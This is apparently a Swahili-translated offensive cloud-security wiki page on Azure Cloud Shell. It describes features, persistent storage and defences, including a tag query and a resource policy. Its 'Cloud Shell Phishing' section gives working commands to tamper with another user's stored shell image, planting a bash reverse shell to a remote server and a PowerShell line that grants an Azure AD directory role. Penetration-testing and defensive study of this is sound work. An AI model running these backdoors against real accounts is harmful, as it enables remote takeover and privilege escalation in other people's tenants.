Az - Cloud Shell

Reading time: 6 minutes

Azure Cloud Shell

Azure Cloud Shell ni terminal ya kuingiliana, iliyothibitishwa, inayopatikana kupitia kivinjari iliyoundwa kwa ajili ya kusimamia rasilimali za Azure, ikitoa uwezekano wa kufanya kazi na Bash au PowerShell. Inafanya kazi kwenye mwenyeji wa muda, kwa kila kikao ambao unakoma baada ya dakika 20 za kutokuwa na shughuli, huku ikihifadhi faili katika eneo la $HOME kwa kutumia sehemu ya faili ya 5-GB. Cloud Shell inaweza kufikiwa kupitia maeneo mengi, ikiwa ni pamoja na lango la Azure, shell.azure.com, Azure CLI na nyaraka za PowerShell, programu ya simu ya Azure, na nyongeza ya Akaunti ya Azure katika Visual Studio Code.

Hakuna ruhusa zilizotolewa kwa huduma hii, kwa hivyo hakuna mbinu za kupandisha hadhi. Pia hakuna aina yoyote ya uhesabuji.

Key Features

• Zana Zilizowekwa Awali: Cloud Shell inajumuisha seti kamili ya zana zilizowekwa awali kama Azure CLI, Azure PowerShell, Terraform, Docker CLI, Ansible, Git, na wahariri wa maandiko kama vim, nano, na emacs. Zana hizi ziko tayari kutumika. Ili orodhesha pakiti na moduli zilizowekwa, unaweza kutumia "Get-Module -ListAvailable", "tdnf list" na "pip3 list".
• Drive ya Azure (Azure:): PowerShell katika Azure Cloud Shell inajumuisha drive ya Azure (Azure:), ambayo inaruhusu urahisi wa kuvinjari rasilimali za Azure kama Compute, Network, na Storage kwa kutumia amri kama za mfumo wa faili. Badilisha kwenda kwenye drive ya Azure kwa cd Azure: na rudi kwenye directory yako ya nyumbani kwa cd ~. Unaweza bado kutumia cmdlets za Azure PowerShell kusimamia rasilimali kutoka kwa drive yoyote.
• Usanidi wa Zana za Kijadi: Watumiaji wanaoanzisha Cloud Shell na akaunti ya hifadhi wanaweza kufunga zana za ziada ambazo hazihitaji ruhusa za mzizi. Kipengele hiki kinaruhusu uboreshaji zaidi wa mazingira ya Cloud Shell, kikimuwezesha mtumiaji kubinafsisha usanidi wao kulingana na mahitaji yao maalum.
• $HOME kudumu: Unapoanzisha Azure Cloud Shell kwa mara ya kwanza, unaweza kuitumia na au bila akaunti ya hifadhi iliyounganishwa.
• Kuchagua kutounganisha hifadhi kunaunda kikao cha muda ambapo faili zinafuta wakati kikao kinapomalizika.
• Ili kuhifadhi faili kati ya vikao, unapata chaguo la kuunganisha akaunti ya hifadhi, ambayo inounganishwa kiotomatiki kama $HOME\clouddrive, huku directory yako ya $HOME ikiokolewa kama faili ya .img katika Sehemu ya Faili.

Cloud Shell Phishing

Ikiwa mshambuliaji atapata picha za watumiaji wengine katika Akaunti ya Hifadhi ambayo ana ufikiaji wa kuandika na kusoma, ataweza kupakua picha hiyo, kuongeza nyuma ya bash na PS ndani yake, na kuipakia tena kwenye Akaunti ya Hifadhi ili wakati mtumiaji atakapofikia shell, amri zitatekelezwa kiotomatiki.

• Pakua, nyuma na upakia picha:

# Download image
mkdir /tmp/phishing_img
az storage file download-batch -d /tmp/phishing_img --account-name <acc-name>

# Mount image
cd /tmp/phishing_img/.cloudconsole
mkdir /tmp/cloudpoison
sudo mount acc_username.img /tmp/cloudpoison
cd /tmp/cloudpoison
sudo mkdir .config
sudo mkdir .config/PowerShell
sudo touch .config/PowerShell/Microsoft.PowerShell_profile.ps1
sudo chmod 777 .config/PowerShell/Microsoft.PowerShell_profile.ps1

# Bash backdoor
echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/${SERVER}/${PORT} 0>&1 &)' >> .bashrc

# PS backdoor
echo "Connect-AzureAD; Add-AzureADDirectoryRoleMember -ObjectId 1246bcfd-42dc-4bb7-a86d-3637ca422b21 -RefObjectId 1D8B2447-8318-41E5-B365-CB7275862F8A" >> .config/PowerShell/Microsoft.PowerShell_profile.ps1
cd /tmp

sudo umount /tmp/cloudpoison

# Upload image
az storage file upload --account-name <acc-name> --path ".cloudconsole/acc_username.img" --source "./tmp/phishing_img/.cloudconsole/acc_username.img"

• Kisha, mwongoze mtumiaji kufikia https://shell.azure.com/

Pata & Zuia Akaunti za Hifadhi za Cloud Shell

Akaunti za hifadhi zilizoundwa na Cloud Shell zimewekwa alama na ms-resource-usage:azure-cloud-shell. Inawezekana kuunda sera ya rasilimali ya Azure inayozuia kuunda rasilimali zenye alama hii.

Pata akaunti zote za hifadhi zilizoundwa na Cloud Shell kwa alama:

az storage account list --output json | jq '.[] | select(.tags["ms-resource-usage"]=="azure-cloud-shell")'

Sera ya kuzuia uundaji wa akaunti za hifadhi za kiotomatiki kwa ajili ya hifadhi ya cloud shell kulingana na lebo:

{
displayName: "Restrict cloud shell storage account creation",
description: "Storage accounts that you create in Cloud Shell are tagged with ms-resource-usage:azure-cloud-shell. If you want to disallow users from creating storage accounts in Cloud Shell, create an Azure resource policy for tags that is triggered by this specific tag. https://learn.microsoft.com/en-us/azure/cloud-shell/persisting-shell-storage#restrict-resource-creation-with-an-azure-resource-policy",
metadata: {
category: "Storage",
version: "1.0.0"
},
mode: "All",
parameters: {
effect: {
type: "String",
metadata: {
displayName: "Effect",
description: "Deny, Audit or Disabled the execution of the Policy"
},
allowedValues: [
"Deny",
"Audit",
"Disabled"
],
defaultValue: "Audit"
}
},
policyRule: {
if: {
allOf: [
{
field: "type",
equals: "Microsoft.Storage/storageAccounts"
},
{
field: "tags['ms-resource-usage']",
equals: "azure-cloud-shell"
}
]
},
then: {
effect: "[parameters('effect')]"
}
}
}

Marejeo

• https://learn.microsoft.com/en-us/azure/cloud-shell/overview
• https://learn.microsoft.com/en-us/azure/cloud-shell/features
• https://learn.microsoft.com/en-us/azure/cloud-shell/using-the-shell-window

Kudumu

Az - Cloud Shell Persistence